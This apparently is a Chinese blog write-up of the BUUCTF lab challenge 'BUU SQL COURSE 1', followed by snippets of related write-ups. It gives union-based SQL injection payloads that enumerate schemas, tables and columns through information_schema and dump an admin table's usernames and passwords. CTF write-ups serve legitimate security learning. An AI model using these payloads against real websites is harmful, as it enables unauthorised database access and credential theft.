BUU SQL COURSE 1

最新推荐文章于 2024-08-29 18:51:09 发布
最新推荐文章于 2024-08-29 18:51:09 发布
阅读量2.8k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lumos427/article/details/116987356
版权

BUU SQL COURSE 1

01 注入点的查找

虽然页面上有登陆框,但是登录框里没有注入点,怎么测试都是用户名密码错误
当点进一个测试新闻里面,查看net就可以发现有提示的注入点
在这里插入图片描述
在这里插入图片描述
我们可以在url后加上来开始注入

02注入

?id=1 order by 1
?id=1 order by 2
?id=1 order by 3

将页面上回显的字符串进行unicode解码,出现了下面的字符串,
在这里插入图片描述
可以发现,当列数为3时就没有了回显,所以进行注入的列数是两列

?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata

在这里插入图片描述

?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='admin'

在这里插入图片描述

?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='content'

在这里插入图片描述

?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='contents'

在这里插入代码片

?id=-1 union select 1,id from admin

爆出了用户名和密码,然后去登录,拿到flag

在这里插入图片描述

在这里插入图片描述

K3NJ
关注
[初级]sql注入之BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3963
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 816
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
BUUCTF)BUU SQL COURSE 1
weixin_63442046的博客
04-28 2579
关于BUU SQL COURSE 1的思路
【CTF Web】BUUCTF BUU SQL COURSE 1 Writeup(SQL注入+信息收集)
HEX9CF的技术博客
08-29 788
1上课用的~点击启动靶机。
BUUCTF/BUU SQL COURSE 1
weixin_44041994的博客
03-19 662
登录按钮点击后是一个登陆界面,随意输入字符点击后显示提示信息"用户名或密码错误",并且抓包发现是提交的POST请求,可以对该登录界面进行暴破操作,但是因为需要猜解两个字段内容且密码内容无提示,时间需求比较久,且需要较庞大的字典。通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。热点按钮显示热点列表,有三个新闻,里面只有无意义的字符串,但是地址栏显示了/content/1。
BUU SQL COURSE
09-19
BUU SQL COURSE是一个SQL注入的实战演练平台。在这个平台上,你可以学习SQL注入的知识点,了解SQL注入的前置知识和一般测试步骤,并使用这些知识来解题。在注入过程中,一般需要找到注入点,闭合语句,带入语句进行...
BUU SQL COURSE 2
最新发布
08-31
BUU SQL COURSE 2可能是针对SQL技能提升的课程,但具体内容无法得知,因为没有具体的信息提供。通常这类课程会覆盖SQL的高级知识点,比如事务处理、存储过程、触发器、高级查询技巧、性能优化、索引的使用等。学习这...
BUU SQL COURSE 1 1(SQL注入)
小谢的博客
10-25 3535
BUU SQL COURSE 1 1(SQL注入)题解
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 7380
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
【CTF练习】BUU SQL COURSE 1
m0_73866435的博客
01-30 755
首先根据题目sql,那么我想着肯定考的是sql注入吧,那么页面显示有4个可点击,
BUUCTF】BUU SQL COURSE 1 1
qq_41369524的博客
12-10 1969
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审题,题目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
【CTF练习】BUU SQL COURSE 1,2024年最新网络安全开发6年了
2401_84253089的博客
04-10 1018
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。id=-1 的使用是为了确保原始查询返回一个空集,从而避免与注入部分有重叠的数据。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
BUUCTF刷题笔记—Basic—BUU SQL COURSE 1
qq_43176656的博客
08-17 413
BUUCTF刷题笔记—Basic—BUU SQL COURSE 1
BUU SQL COURSE 1 1
oJiuJieZhong的博客
10-20 1358
http://6f38f91e-0206-4565-bdbb-186602b4bde9.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,group_concat%28schema_name%29%20from%20information_schema.schemata--+ http://6f38f91e-0206-4565-bdbb-186602b4bde9.node4.buuoj.cn:81/backe.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值